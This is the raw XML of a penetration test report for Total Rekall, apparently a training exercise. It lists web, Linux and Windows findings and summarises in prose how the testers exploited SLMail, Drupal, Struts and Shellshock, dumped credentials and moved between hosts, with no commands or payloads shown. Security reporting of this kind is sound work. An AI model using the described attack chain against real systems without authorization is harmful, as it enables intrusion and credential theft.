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35"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4">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5">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6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MilkTeaDuckExploits </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="451" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="17365d" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Aaron (Erin) Wright </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="451" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="17365d" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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3A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Penetration Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3D">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3E">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3F">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0">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2">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3">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10/8/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Erin Wright </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fleshed Out Initial Exploits </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12/8/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Erin Wright </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+Web Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">16/8/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Erin Wright </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+Linux Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">19/8/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Erin Wright </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+Windows Exploits </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21/8/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Erin Wright</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+Initial Summary </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">22/8/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Erin Wright</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+Final Summary </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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For the testing, we focused on the following:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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6B">
      <w:pPr>
        <w:ind w:firstLine="30"/>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Rekall has outlined the following objectives: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7">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8">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9">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A">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7B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromise several machines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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83">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84">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9A">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C">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D">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A2">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A3">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A4">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A5">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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3545840"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Chart&#10;&#10;Description automatically generated with medium confidence" id="42" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Chart&#10;&#10;Description automatically generated with medium confidence" id="0" name="image27.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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great mitigation strategy in place for DDOS attacks to ensure site and network uptime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Employment of security professionals to test for exploits so that the network can be further secured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A number of metasploit exploits patched for a large amount of potential vulnerabilities.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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application is vulnerable to XSS Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application is vulnerable to SQL Injection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials are stored in plaintext on the Web Application login page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Server is outdated and thus susceptible to multiple vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SLMail Server is vulnerable to RCE exploits that make the whole network vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poor implementation of secure passwords across the entire network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poor use of 2fa to secure sensitive data </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap scans of the network displaying multiple open ports with little to no security allowing exploitation to occur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ease of access to credential hashes and low quality passwords allowed for privilege escalation, traversal of systems and unauthorized access to sensitive files.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1"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:rPr/>
      </w:pP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During the Penetration testing of Total Rekall’s assets, MilkTeaDuckExploits (MTDE) was able to identify several vulnerabilities ranging in severity that could have significant impacts to the reputation and revenue of Total Rekall. MTDE was able to successfully gain access to system accounts and assets across a number of platforms where sensitive data was accessed and privileges escalated.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MTDE began testing on Rekall’s Web Application where we determined that it was susceptible to a number of attack types such as XSS, SQL injection and Local File Inclusions. This allowed malicious scripts to be run across the Web Application. Almost all text inputs were susceptible to XSS and if not SQL injection. A recommendation across the board is to employ input validation where none is present and increase the strength of the validation where it is present as all were able to be bypassed.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was a lot of unsecured data present on the internet that required securing to add additional security. This was possibly one of the more shocking vulnerabilities with login credentials present in plaintext tucked away in the html of the login page. Second to this was the presence of a GitHub repository that contained user credentials in it which provided access to a number of confidential files within the Web Application. </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looking at open source information MTDE began work looking at the Linux Environment. We began by performing a Nessus scan combined with a Nmap scan. The Nessus scan revealed Apache was out of date and a Remote Code Execution (RCE) vulnerability was present. The Nmap scan revealed 5 IP addresses all with varying open ports and vulnerabilities. One of which was a system running Drupal. With credentials already obtained MTDE was able to successfully exploit Drupal, Struts and Shellshock vulnerabilities and escalate privileges.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Moving onto the Windows Environment an Nmap scan revealed a Vulnerable Server and Windows 10 Machine. Utilizing an SLMail exploit MTDE were able to gain shell access and dump windows credentials for systems as well as dump cached credentials. These credentials were then used to traverse to the Windows Machine from the Server with system privileges and dump further administrator credentials on the Windows Machine. </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summary, a number of exploits were discovered across the Web Application, Linux Systems and Windows Systems. These exploits, if accessed by a malicious actor, could cause irreversible damage to Rekall’s reputation and revenue streams. MTDE has provided recommended strategies for patching these vulnerabilities so that Rekall can secure their assets and prevent unauthorized access to sensitive data. </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D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ua1m3sq7w7q" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uxxi438b55sx" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1hn6712t73i3" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
